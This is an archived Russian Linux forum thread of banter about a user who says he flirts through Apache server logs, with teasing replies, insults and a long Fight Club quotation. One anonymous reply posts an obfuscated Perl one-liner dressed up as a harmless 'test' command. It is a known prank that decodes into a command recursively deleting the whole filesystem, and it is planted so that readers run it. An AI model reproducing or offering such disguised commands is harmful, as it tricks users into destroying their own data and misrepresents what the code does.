LINUX.ORG.RU
ФорумTalks

знакомства.


0

0

Перепивыаюсь счас с одной девушкой в Питере, через логи апача на её сервере стихи ей пишу...

а она мне отвечает через логи моего апача.

Как вы думаете, стоит ли мне поднимать телнет-демон, чтобы както визуализировать общение? Софтинку конешно можно скачать, но вот стоит ли переходить в режим аскии-графики?

☆☆

p.s. причем, зараза, умная, жгет как в реальности, но на самом деле так здорово оттягиваться =)

vilfred ☆☆
() автор топика

Telnet?!!!! В наш век развитого SSH????

blaster999 ★★
()

велфред, ты читал "бойцовский клуб" паланика? там главный главный герой страдал раздвоением личности. сначала он сам с собой дрался, потом организовал бойцовский клуб и варил мыло со своим альтер-эго, потом его альтер эго приказало его же друзьям отрезать на следующий день своей настоящей личности. всё кончилось, к счастью, хорошо, но тем не менее, будь осторожен...

asgard
()

ты наверное действительно угребище лесное, что даже в режиме аски-графики боишься общаться.

anonymous
()

не, мужики, я не могу просто, дайте хоть раз посмеяться от души =) вот что пишут в другом форуме:

==================================================

:ты еще не видал просто девушек на просторе рунета, без протокола http. еслчиё


на этой фразе мой мозг сломался и потребовал пива.

++++++++++++++++++++++++

эх, дайте две

vilfred ☆☆
() автор топика
Ответ на: комментарий от asgard

>всё кончилось, к счастью, хорошо

сразу видно не читал

gnomino
()
Ответ на: комментарий от vilfred

Очень мучает вопрос, как же вы умудрились познакомиться ?

anonymous
()

cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

anonymous
()
Ответ на: комментарий от manntes

фильм вообще смотреть не стоит. его оцензурили и всё этим испортили.

asgard
()
Ответ на: комментарий от manntes

это ты про че? в палате номер 6 яйцы не отрезали, там в психушку.

vilfred ☆☆
() автор топика
Ответ на: комментарий от manntes

таки не отрезали.

----
-- Вы же знаете расклад, мистер Дерден. Вы сами говорили. Сказали -- если кто-нибудь когда-нибудь попытается закрыть клуб, -- даже вы сами -- схватить его и отрезать ему яйца.
Шары.
Хозяйство.
Орехи.
Huevos.
Представьте, что лучшая часть вашего тела лежит, замороженная, в пакетике в Мыловаренной Компании на Пэйпер-Стрит.
-- Вы же знаете, драться с нами бессмысленно, -- говорит механик.
Водитель автобуса жует бутерброд, поглядывая на нас в зеркало заднего обзора.
... skipped ...
Кто-то издалека, совсем издалека, кричит:
-- Вам знаете, о чем речь, мистер Дерден. Не вы*бывайтесь перед бойцовским клубом.
Теплая рука обхватывает тебя снизу. Ледяной кончик ножа. Рука ложится на грудь. Терапевтический физический контакт. И эфир давит на нос и рот, сильно. Потом ничто, даже не совсем ничто. Забвение.
... skipped ...
Просыпаюсь на бетонном перекрытии. Когда-то здесь был кленовый паркет. До взрыва здесь были картины на стенах. Была шведская мебель. До Тайлера.
Я одет. Засовываю руку в карман и чувствую.
Я цел.
----

http://zhurnal.lib.ru/e/egorenkow_a_m/fightclub.shtml

asgard
()

Давай чувак продолжай в том же духе и скоро будет еще хуже... к примеру когда на тусе все выпьют и будут самок своих тискать ты будешь выжирать стакан водки, собираясь уже домой, дико жалея себя.

Oceanborn
()
Ответ на: комментарий от true

> Ты уверен, что это девушка?

+1, это жирный бородатый админ

swizard
()

дай ей номерок своей быдлоаськи и если она ответит, что асько не тру, то тогда конечно смело переходи к стадии аскей-графики

MoRoZ
()

простите запямятовал, а стадия аски графики идет до или после ssh. Jabber я так понимаю, это аналог постели в реальной жизни?

AiFiLTr0 ★★★★★
()

> Перепивыаюсь

Вот и думай, что он делает. Переписывается или ещё что :)

Deleted
()

я только одного не могу понять. КАК вы друг друга в своих логах апача нашли??? На всех моих серверах висячие ссылки и попытки взлома так часты что там ничего не найти вообще. Или вы ДДОСите друг друга строчками стихов своих ?

gods-little-toy ★★★
()

если долго др*чить на командную строчку, то командная строчка начнет др*чить на тебя. (ц) Классический пример. Человеку пора из-за компа выбраться...

AiFiLTr0 ★★★★★
()

Не пойму я, vilfred это типа местный наркоман?

То про системы отсчёта мега-отжиги, то эротические фантазии насчёт апача. Не представляю, как такое может придти в голову без веществ. Разве что чувство юмора такое мега-специфическое.

anonymous
()
Ответ на: комментарий от Deleted

>Не, аналог постели - это дать ей аккаунт на своем сервере.

это уж, считай, законый брак

grinn ★★
()
Ответ на: комментарий от anonymous

>Не пойму я, vilfred это типа местный наркоман? ...

анонизмус, сгинь! vilfred - наше всё! :)

anonymous
()
Ответ на: комментарий от vilfred

эм-м-м, а слабо друг другу дать юзерсуий ssh доступ?

hooj ★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.